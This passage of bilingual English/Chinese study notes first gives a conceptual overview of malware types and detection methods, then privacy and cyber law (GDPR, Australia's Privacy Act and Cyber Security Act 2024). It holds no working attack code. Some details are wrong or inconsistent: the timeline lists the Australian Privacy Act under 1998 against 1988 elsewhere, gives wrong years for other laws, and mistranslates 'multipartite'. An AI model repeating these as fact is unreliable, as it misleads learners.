Execution / 执行	The payload function is performed. 执行有效载荷功能。

3.3 Classification by Target / 按目标分类

Type / 类型	Description / 描述
Boot sector infector / 引导扇区感染者	Infects master boot record (MBR); spreads when booting from infected disk. 感染主引导记录（MBR）；从受感染磁盘启动时传播。
File infector / 文件感染者	Infects executable files that the OS considers runnable. 感染操作系统认为可运行的可执行文件。
Macro virus / 宏病毒	Infects files with macro/scripting code (Word, Excel, PDF). 感染含有宏/脚本代码的文件（Word、Excel、PDF）。
Multipartite virus / 多态病毒	Infects in multiple ways; targets multiple file types simultaneously. 以多种方式感染；同时针对多种文件类型。

3.4 Classification by Concealment Strategy / 按隐藏策略分类

Type / 类型	Description / 描述
Stealth virus / 隐形病毒	Designed to hide itself from AV software; the entire virus is hidden. 专为躲避杀毒软件而设计；整个病毒被隐藏。
Encrypted virus / 加密病毒	Uses encryption to obscure its content. 使用加密混淆其内容。
Polymorphic virus / 多态病毒	Changes form each time it infects another program. 每次感染其他程序时都会改变形态。
Metamorphic virus / 变形病毒	Higher-order polymorphic; can be completely rewritten between transitions. 高阶多态；在转换之间可以完全重写自身。

4. Worms / 蠕虫

Definition: A program that self-propagates/replicates across systems; standalone — does not need a host program. 定义： 在系统间自我传播/复制的程序；独立存在 — 不需要宿主程序。

Exploits software vulnerabilities in client or server programs to gain access. 利用客户端或服务器程序中的软件漏洞获取访问权限。

4.1 Worm Replication Methods / 蠕虫复制方式

Method / 方式	Description / 描述
Email / instant messenger	Emails a copy of itself or sends as attachment via IM. 通过电子邮件发送自身副本或以附件形式通过即时消息发送。
File sharing	Creates a copy on removable media (USB drive) or infects shared files. 在可移动媒体（U盘）上创建副本或感染共享文件。
Remote execution	Executes copy on another system using remote execution or exploiting a service flaw. 使用远程执行或利用服务缺陷在另一系统上执行副本。
Remote file access/transfer	Uses FTP or similar to copy itself to another system. 使用FTP或类似工具将自身复制到另一系统。
Remote login	Logs into remote system as a user and copies itself. 作为用户登录远程系统并复制自身。

Worms spread faster than viruses because they parallelize propagation. 蠕虫比病毒传播更快，因为它们并行化传播过程。
Viruses spread slowly because they require user action for each propagation. 病毒传播缓慢，因为每次传播都需要用户操作。

4.2 Case Study: The Morris Worm / 案例：莫里斯蠕虫

One of the first worms distributed via the Internet. 首批通过互联网传播的蠕虫之一。
Released by Robert Morris in 1988; targeted UNIX systems. 1988年由Robert Morris释放；针对UNIX系统。
Within 24 hours: ~6,000 of the ~60,000 Internet-connected computers were infected. 在24小时内：约60,000台联网计算机中的约6,000台被感染。
Did not destroy files, but caused: military/university functions to slow to a crawl; emails delayed for days. 未破坏文件，但导致：军事/大学功能陷入瘫痪；电子邮件延迟数天。

5. Trojan Horse / 木马

Definition: Software that appears to perform a desirable function but is actually designed to perform undisclosed malicious functions. It is not self-replicating. 定义： 看似执行有用功能但实际上被设计为执行未披露的恶意功能的软件。它不自我复制。

Concealment methods / 隐藏方法：

Renames itself to the name of a valid system file. 将自身重命名为合法系统文件的名称。
Can be encrypted and polymorphic — installs itself in different ways to escape detection. 可以是加密和多态的 — 以不同方式安装自身以逃避检测。

6. Logic Bombs / 逻辑炸弹

Definition: A program that performs a malicious action when a specific external event occurs; embedded in malware, set to "explode" when conditions are met. 定义： 在特定外部事件发生时执行恶意操作的程序；嵌入恶意软件中，在满足条件时"爆炸"。

Trigger conditions / 触发条件示例：

Presence or absence of certain files or devices. 特定文件或设备的存在或缺失。
A particular day of the week or date (e.g., IF date = "April 1 2025" THEN DELETE_ALL_FILES()). 特定星期几或日期。
A particular version or configuration of software. 特定软件的版本或配置。
A particular user running the application. 特定用户运行应用程序。

Once triggered: may alter or delete data/files, cause machine damage. 触发后：可能修改或删除数据/文件，造成机器损坏。

7. Backdoor (Trapdoor) / 后门（陷门）

Definition: A secret entry point into a program that allows someone to gain access without going through normal security procedures. 定义： 程序中的秘密入口点，允许某人绕过正常安全程序获得访问权限。

Originally used by programmers to debug and test programs. 最初由程序员用于调试和测试程序。
Now exploited for unauthorised access. 现在被利用于未经授权的访问。
Usually implemented as a network service listening on a non-standard port. 通常实现为在非标准端口上监听的网络服务。
Example: WannaCry ransomware included such a backdoor. 示例：WannaCry勒索软件包含此类后门。
Difficult to control at the OS level — applications can implement their own backdoors. 难以在操作系统层面控制——应用程序可以实现自己的后门。

8. Ransomware / 勒索软件

Definition: Malware that attacks availability — encrypts victim's data and demands payment for the decryption key. 定义： 攻击可用性的恶意软件 — 加密受害者数据并要求付款以获得解密密钥。

Crypto-ransomware: encrypts files; payment → password/key. 加密勒索软件：加密文件；付款 → 密码/密钥。
Symantec report (April 2015): ransomware grew 113% in 2014; ~24,000 attacks per day. 赛门铁克报告（2015年4月）：勒索软件2014年增长113%；每天约24,000次攻击。

9. Countermeasures for Malware / 恶意软件对抗措施

9.1 Data vs Instructions Approach / 数据与指令方法

Malware acts as both data and instructions — virus code is inserted as "data" but then executed. 恶意软件同时充当数据和指令 — 病毒代码以"数据"形式插入，但随后被执行。
Protection approach / 保护方法：
- Treat all programs as type "data" by default. 默认将所有程序视为**"数据"**类型。
- Only a certifying authority can change the type to "executable" after verification. 只有认证机构在验证后才能将类型更改为"可执行"。

9.2 Reducing Rights / Sandboxing / 减少权限 / 沙箱

Malicious code running under a user's identity can access all objects in the user's protection domain. 以用户身份运行的恶意代码可以访问用户保护域内的所有对象。
Protection: Limit the objects accessible to a given process: 保护： 限制给定进程可访问的对象：
- Reducing the Rights / 减少权限 — apply least privilege to processes. 应用最小权限原则于进程。
- Sandboxing / 沙箱 — run programs in isolated virtual environments. 在隔离的虚拟环境中运行程序。
Symantec (2014): up to 28% of all malware was "virtual machine aware" — could detect sandboxes and behave differently. 赛门铁克（2014年）：高达28%的恶意软件能感知虚拟机 — 可以检测沙箱并表现不同。

9.3 Domain Boundary Control / 域边界控制

Restrict users in different protection domains from sharing programs or data. 限制不同保护域中的用户共享程序或数据。
Programs to be protected should be at the lowest level of a multilevel security policy. 需要保护的程序应处于多级安全策略的最低级别。

10. Malware Detection / 恶意软件检测

10.1 Behaviour-Based Detection / 基于行为的检测

Normal system behaviour differs from an infected system's activity profile. 正常系统行为与受感染系统的活动特征不同。
Monitors: attempts to write to boot sector, modify interrupt vectors, write to system files. 监控：尝试写入引导扇区、修改中断向量、写入系统文件。

	Details / 详情
Advantages / 优点	Works for all viruses; detection is before complete infection. 适用于所有病毒；在完全感染之前检测。
Disadvantages / 缺点	High sensitivity → many false alarms. 高灵敏度 → 大量误报。

10.2 Multiple Copy Testing / 多副本测试

Run several copies of the same program and compare results. 运行同一程序的多个副本并比较结果。
Majority rules — if outputs differ, action may be needed. 多数决定 — 如果输出不同，可能需要采取行动。
Limitation: if all copies are corrupted, majority still can't be trusted. 局限性：如果所有副本都被污染，多数仍不可信。

10.3 Signature Scanning / 特征码扫描

Definition: Match files against a database of known malware signatures (search strings). 定义： 将文件与已知恶意软件特征码（搜索字符串）数据库进行匹配。

Signature extraction process / 特征码提取过程：

Disassemble the infection and identify key portions. 反汇编感染体并识别关键部分。
Combine key portions to form a signature. 组合关键部分形成特征码。
Check against large library to reduce false positives. 与大型库对比以减少误报。

	Details / 详情
Advantages / 优点	Works against Trojans, logic bombs, and other malware. 可用于检测木马、逻辑炸弹和其他恶意软件。
Disadvantages / 缺点	Cannot detect new viruses before patterns are known; ineffective against polymorphic viruses. 在模式已知前无法检测新病毒；对多态病毒无效。

10.4 Generations of Antivirus Scanners / 杀毒扫描器的代际演进

Generation / 代际	Description / 描述
1st Generation / 第一代	Signature scanning only. 仅特征码扫描。
2nd Generation / 第二代	Heuristic rules (for polymorphic viruses) + integrity checks (checksums). 启发式规则（针对多态病毒）+ 完整性检查（校验和）。
3rd Generation / 第三代	Behaviour-based detection — e.g., triggering on inappropriate system file interactions. 基于行为的检测 — 例如，对不当的系统文件交互触发检测。
4th Generation / 第四代	Combination of multiple antivirus techniques + virtualisation (run suspected malware in isolated environment). 多种杀毒技术的组合 + 虚拟化（在隔离环境中运行可疑恶意软件）。

Day 3-2 — Laws and Regulations / 法律与法规

1. Introduction to Law / 法律简介

Law = A collection of rules which govern our society; used to mandate or prohibit certain behaviour. 法律 = 规范社会的规则集合；用于强制要求或禁止某些行为。

Laws are drawn from ethics — socially acceptable behaviours. 法律源于伦理 — 社会可接受的行为规范。
Ethics are based on cultural mores — fixed moral attitudes or customs of a particular group. 伦理基于文化习俗 — 特定群体固定的道德态度或风俗。
Key difference: Laws carry the authority of a governing body; ethics do not. 关键区别： 法律具有管理机构的权威；伦理则没有。

1.1 Policy vs Law / 政策与法律

	Policy / 政策	Law / 法律
Scope	Internal — within a company 内部 — 公司内部	External — government/society 外部 — 政府/社会
Binding?	Not legally binding 不具法律约束力	Legally binding 具有法律约束力
Purpose	Describe acceptable/unacceptable employee behaviors 描述员工可接受/不可接受的行为	Mandate or prohibit behaviour 强制要求或禁止行为
Enforcement	Internal penalties, judicial practices, sanctions 内部处罚、司法实践、制裁	Criminal/civil prosecution 刑事/民事诉讼

1.2 Categories of Law / 法律类别

Law / 法律
├── Public Law / 公法 (State ↔ Citizens / 国家 ↔ 公民)
│   ├── Criminal / 刑法
│   ├── Administrative / 行政法
│   └── Constitutional / 宪法
└── Private (Civil) Law / 私法（民法）(Individual ↔ Individual / 个人 ↔ 个人)
    ├── Family / 家庭法
    ├── Commercial / 商法
    └── Labor / 劳动法

2. Cyber Law / 网络法

Cyber law = Framework and regulations related to protecting computer systems, networks, and data from cyberattacks. 网络法 = 与保护计算机系统、网络和数据免受网络攻击相关的框架和法规。

Cyber laws seek to address / 网络法涵盖领域：

Privacy and Data Protection / 隐私与数据保护
Intellectual Property Protection / 知识产权保护
Cybersecurity and Cybercrime / 网络安全与网络犯罪
E-Commerce and Online Contracts / 电子商务与在线合同
Internet Governance / 互联网治理
Liability and Responsibility / 责任与义务

Types of Cyber Laws / 网络法类型：

Privacy Laws / 隐私法
Data Protection Laws / 数据保护法
Copyright and Intellectual Property Laws / 版权与知识产权法
E-commerce Laws / 电子商务法
Cybercrime Laws / 网络犯罪法

Key Global Cybersecurity Laws Timeline / 全球网络安全法律时间线：

Year / 年份	Law / 法律
1984	Data Protection Act (UK)
1986	Electronic Communications Privacy Act (US)
1996	Electronic Communications Privacy Act amendments (US)
1998	Privacy Act (Australia); COPPA (US); Identity Theft Act (US)
2001	Council of Europe Convention on Cybercrime
2004	PCI DSS
2012	Cybercrime Prevention Act (Philippines)
2014	Cybersecurity Law of China
2017	Federal Information Security Modernization Act (US)
2018	General Data Protection Regulation (GDPR) (EU)

Effective: 25 May 2018 / 生效： 2018年5月25日
Issued by: European Union (EU) / 发布方： 欧盟
Purpose: Enforceable, uniform requirements for protecting personal data of EU individuals. 目的： 为保护欧盟个人的个人数据制定可执行的统一要求。
Fines can reach tens of millions of euros for violations. 违规罚款可高达数千万欧元。

3.1 What is Protected? / 保护对象

Personal data = Any information relating to an identified or identifiable natural person ("data subject"). 个人数据 = 与已识别或可识别的自然人（"数据主体"）相关的任何信息。

Includes: name, ID number, location data, online identifier, or factors specific to physical, physiological, genetic, mental, economic, cultural or social identity. 包括：姓名、身份证号、位置数据、网络标识符，或与身体、生理、遗传、心理、经济、文化或社会身份相关的因素。

Applies to automated and manual processing (collecting, storing, organizing, etc.). 适用于自动化和手动处理（收集、存储、整理等）。
Exception: Does not apply to purely personal or household activity. 例外： 不适用于纯粹的个人或家庭活动。

3.2 Territorial Scope / 领土范围

GDPR applies to organisations that: GDPR适用于以下组织：

Have a controller or processor established in the EU; or 在欧盟设有控制者或处理者；或
Are offering services/goods or monitoring behaviour of individuals in the EU. 向欧盟个人提供服务/商品或监控其行为。

Key terms / 关键术语：

Controller / 控制者： Determines the purposes and means of processing personal data. 决定个人数据处理的目的和方式。
Processor / 处理者： Processes personal data on behalf of the controller. 代表控制者处理个人数据。

#	Principle / 原则	Description / 描述
1	Lawfulness, Fairness & Transparency / 合法性、公平性与透明度	Processing must be lawful; data subject must reasonably expect it; be open and honest. 处理必须合法；数据主体可合理预期；公开诚实。
2	Purpose Limitation / 目的限制	Data collected for specified, explicit, legitimate purposes; not used for incompatible purposes. 为特定、明确、合法目的收集；不得用于不兼容的目的。
3	Data Minimisation / 数据最小化	Data shall be adequate, relevant, and limited to what is necessary. 数据应适当、相关且限于必要范围。
4	Accuracy / 准确性	Data must be accurate, kept up to date, and erased/rectified without delay if inaccurate. 数据必须准确、保持最新，不准确时须立即删除/更正。
5	Storage Limitation / 存储限制	Kept no longer than necessary for the purpose; longer only for archiving/research/statistical purposes. 保留时间不超过目的所需；仅可为存档/研究/统计目的而延长。
6	Integrity & Confidentiality / 完整性与机密性	Appropriate security measures: technical (encryption, 2FA) and organisational (staff training, security policy). 适当的安全措施：技术措施（加密、双因素认证）和组织措施（员工培训、安全政策）。
7	Accountability / 问责制	Controller is responsible and must demonstrate compliance; ongoing obligation to review measures. 控制者负责且必须证明合规；持续审查措施的义务。

3.4 Rights of Data Subjects / 数据主体权利

Data subjects have 8 privacy rights / 数据主体拥有8项隐私权利：

The right to be informed / 知情权
The right of access / 访问权
The right to rectification / 更正权
The right to erasure ("right to be forgotten") / 删除权（"被遗忘权"）
The right to restrict processing / 限制处理权
The right to data portability / 数据可携带权
The right to object / 反对权
Rights in relation to automated decision making and profiling / 自动决策与画像相关权利

3.5 Data Transfers to Third Countries / 向第三国传输数据

GDPR restricts transfer of personal data outside the EU. GDPR限制个人数据向欧盟以外传输。
Transfer allowed only if the receiving country has an adequate level of protection (Article 45 — adequacy decision). 仅当接收国具有充分的保护水平时才允许传输（第45条——充分性决定）。
Australia has not been recognised as providing adequate protection for Article 45 purposes. 澳大利亚尚未被认定为提供第45条目的所需的充分保护。
Alternative: use Standard Data Protection Clauses or Binding Corporate Rules. 替代方案：使用标准数据保护条款或约束性公司规则。

Two-tier fine structure (Article 83) / 两级罚款结构（第83条）：

Severity / 严重程度	Fine / 罚款
Less severe infringements / 较轻违规	Up to €10 million or 2% of global annual turnover, whichever is higher. 最高1000万欧元或全球年营业额的2%，取较高值。
More serious infringements / 严重违规	Up to €20 million or 4% of global annual turnover, whichever is higher. 最高2000万欧元或全球年营业额的4%，取较高值。

3.7 Case Study: Meta/Facebook Fine / 案例：Meta/Facebook罚款

May 2023: Meta (Facebook) fined €1.2 billion by Ireland's Data Protection Commission. 2023年5月： Meta（Facebook）被爱尔兰数据保护委员会罚款12亿欧元。
Reason: Violated GDPR Article 46(1) by continuing to transfer personal data from EU/EEA to the USA without adequate safeguards. 原因： 违反GDPR第46(1)条，在没有充分保障措施的情况下继续将个人数据从欧盟/欧洲经济区传输至美国。
Lesson: A landmark case — sends a clear message about the importance of data confidentiality compliance for major tech companies. 教训： 具有里程碑意义的案例——向主要科技公司发出关于遵守数据保密合规的明确信息。

4. Australian Privacy Act 1988 / 澳大利亚隐私法1988

Principal Australian legislation protecting the handling of personal information about individuals. 澳大利亚主要立法，保护有关个人的个人信息处理。
Covers: collection, use, storage, and disclosure in federal public sector and private sector. 涵盖：联邦公共部门和私营部门中的收集、使用、存储和披露。
Has been amended many times: 1991, 1994, 2000, 2001, 2010, 2011, 2018, 2022. 已多次修订：1991、1994、2000、2001、2010、2011、2018、2022年。

4.1 Australian Privacy Principles (APPs) / 澳大利亚隐私原则

13 APPs are the cornerstone of the privacy protection framework. 13项APP是隐私保护框架的基石。
Principles-based law — gives organisations flexibility to tailor practices. 基于原则的法律 — 给予组织灵活性以调整实践。
Technology neutral — adapts to changing technologies. 技术中立 — 适应技术变化。
Breach of an APP = "interference with the privacy of individual" → regulatory action and penalties. 违反APP = "侵犯个人隐私" → 监管行动和处罚。

13 APPs Summary / 13项APP摘要：

APP	Title / 标题	Description / 描述
Part 1: Consideration of personal information privacy / 个人信息隐私的考虑
APP1	Open & transparent management / 公开透明管理	Must have clearly expressed, up-to-date APP privacy policy. 必须有明确表达、最新的APP隐私政策。
APP2	Anonymity & pseudonymity / 匿名与假名	Individuals must have option to not identify themselves or use a pseudonym. 个人必须可以选择不识别自身或使用假名。
Part 2: Collection of personal information / 个人信息的收集
APP3	Collection of solicited information / 主动收集信息	Entity must manage collection in open and transparent way. 实体必须以公开透明的方式管理收集。
APP4	Unsolicited personal information / 非主动收集信息	Must handle unsolicited information appropriately. 必须妥善处理非主动收集的信息。
APP5	Notification of collection / 收集通知	Must notify individual when collecting their information. 收集个人信息时必须通知当事人。
Part 3: Dealing with personal information / 个人信息的处理
APP6	Use or disclosure / 使用或披露	Specifies how collected information can be used or disclosed. 规定如何使用或披露收集的信息。
APP7	Direct marketing / 直接营销	Personal information must not be used for direct marketing except in special cases. 个人信息不得用于直接营销，特殊情况除外。
APP8	Cross-border disclosure / 跨境披露	Requirements for disclosing personal information to other countries. 向其他国家披露个人信息的要求。
APP9	Government identifiers / 政府标识符	Conditions for adopting/using/disclosing government-related identifiers. 采用/使用/披露政府相关标识符的条件。
Part 4: Integrity of personal information / 个人信息的完整性
APP10	Quality / 质量	Must ensure accuracy, completeness, and timeliness of data. 必须确保数据的准确性、完整性和及时性。
APP11	Security / 安全	Must protect from misuse, loss, unauthorised access; destroy/de-identify when no longer needed. 必须防止滥用、丢失、未授权访问；不再需要时销毁/去识别化。
Part 5: Access to and correction of personal information / 个人信息的访问与更正
APP12	Access / 访问	Individual can access their personal information held by entity (with some exceptions). 个人可访问实体持有的个人信息（有部分例外）。
APP13	Correction / 更正	Entity must correct personal information when required. 实体在需要时必须更正个人信息。

4.2 Case Study: Medibank Data Breach / 案例：Medibank数据泄露

October 2022: Medibank experienced a major breach affecting 9.7 million customers. 2022年10月： Medibank遭遇重大泄露，影响970万客户。
Personal information released on the dark web. 个人信息被发布在暗网上。
Australian Information Commissioner alleges Medibank breached the Privacy Act 1988 by failing to take reasonable steps to protect personal information. 澳大利亚信息专员指控Medibank违反1988年隐私法，未采取合理措施保护个人信息。
Federal Court can impose civil penalty of up to $2.22 million per contravention. 联邦法院可对每项违规处以最高222万澳元的民事处罚。

5. Australian Cybersecurity Legislation Timeline / 澳大利亚网络安全立法时间线

Year / 年份	Legislation / 立法
1979	Telecommunications (Interception and Access) Act 1979 / 电信（拦截与访问）法1979
1988	Privacy Act 1988 / 隐私法1988
1995	Criminal Code Act 1995 / 刑法典法1995
1997	Telecommunications Act 1997 / 电信法1997
2015	Telecommunications (Interception and Access) Amendment (Data Retention) Act 2015 / 电信（数据留存）修正法2015
2024	Cyber Security Act 2024 / 网络安全法2024

6. Cyber Security Act 2024 / 2024年网络安全法

Issued: 29 November 2024 / 发布： 2024年11月29日
Brings Australia in line with international best practice; part of the 2023-2030 Australian Cyber Security Strategy. 使澳大利亚符合国际最佳实践；是2023-2030年澳大利亚网络安全战略的一部分。

4 Key Initiatives / 4项关键举措：

6.1 Minimum Cyber Security Standards for Smart Devices / 智能设备最低网络安全标准（Part 2）

Establishes mandatory security standards for IoT (smart) devices sold in Australia. 为在澳大利亚销售的物联网（智能）设备建立强制性安全标准。
Responsibility on manufacturers and suppliers to ensure devices meet requirements. 制造商和供应商有责任确保设备符合要求。
Must produce a statement of compliance including: product type & batch identifier, manufacturer name & address, declaration of compliance. 必须出具合规声明，包括：产品类型和批次标识符、制造商名称和地址、合规声明。

6.2 Mandatory Ransomware Payment Reporting / 强制勒索软件付款报告（Part 3）

Reporting business entities (carrying on business in Australia above turnover threshold; not a Commonwealth or State body) must report ransomware payments within 72 hours. 报告义务商业实体（在澳大利亚经营、营业额超过门槛、非联邦或州机构）必须在72小时内报告勒索软件付款。
Failure to report: civil penalty of 60 penalty units ($19,800). 未报告：民事处罚60个罚款单位（19,800澳元）。
Purpose: Build a more informed picture of the threat landscape; disrupt the ransomware business model. 目的：建立更清晰的威胁格局认识；破坏勒索软件商业模式。

6.3 Limited Use Obligation for National Cyber Security Coordinator / 国家网络安全协调员有限使用义务

Encourages industry engagement with government following cyber incidents. 鼓励网络事件后行业与政府的合作。
Information shared with the Coordinator has limited use — cannot be used for regulatory/enforcement purposes. 与协调员共享的信息用途有限 — 不能用于监管/执法目的。

6.4 Cyber Incident Review Board / 网络事件审查委员会

An independent statutory advisory body. 独立的法定咨询机构。
Conducts no-fault, post-incident reviews of significant cyber security incidents. 对重大网络安全事件进行无过错事后审查。
Makes recommendations to Government and industry on prevention, detection, response, and minimisation. 向政府和行业就预防、检测、响应和最小化提出建议。
Composition: Chair (appointed by Minister) + Standing Members + Expert Panel. 组成： 主席（由部长任命）+ 常务成员 + 专家小组。
Review Process: Incident occurs → referred to Board → Board decision → Terms of Reference drafted → Review undertaken → Draft report → Final report published. 审查流程： 事件发生 → 提交委员会 → 委员会决定 → 起草职权范围 → 开展审查 → 起草报告 → 发布最终报告。

7. 2023-2030 Australian Cybersecurity Strategy / 2023-2030澳大利亚网络安全战略

Vision: By 2030, Australia will be a world leader in cyber security. 愿景： 到2030年，澳大利亚将成为网络安全领域的世界领导者。

Six Cyber Shields / 六大网络盾牌：

Shield / 盾牌	Key Initiatives / 关键举措
1. Strong businesses and citizens / 强大的企业和公民	Support SMEs; help Australians defend against cyber threats; break ransomware business model; provide cyber guidance; support victims of identity theft. 支持中小企业；帮助澳大利亚人防御网络威胁；破坏勒索软件商业模式；提供网络指导；支持身份盗窃受害者。
2. Safe technology / 安全技术	Ensure trust in digital products and software; protect valuable datasets; promote safe use of emerging technology. 确保对数字产品和软件的信任；保护有价值的数据集；促进新兴技术的安全使用。
3. World-class threat sharing and blocking / 世界级威胁共享与拦截	Create whole-of-economy threat intelligence network; scale threat-blocking capabilities. 建立全经济体威胁情报网络；扩展威胁拦截能力。
4. Protected critical infrastructure / 受保护的关键基础设施	Clarify scope of critical infrastructure regulation; strengthen cybersecurity obligations; pressure-test critical infrastructure to identify vulnerabilities. 明确关键基础设施监管范围；加强网络安全义务；对关键基础设施进行压力测试以识别漏洞。
5. Sovereign capabilities / 主权能力	Grow and professionalise national cyber workforce; accelerate local cyber industry, research and innovation. 发展并专业化国家网络人才队伍；加速本地网络产业、研究和创新。
6. Resilient region and global leadership / 有韧性的区域与全球领导力	Support a cyber resilient region; shape, uphold and defend international cyber rules, norms and standards. 支持具有网络韧性的区域；塑造、维护和捍卫国际网络规则、规范和标准。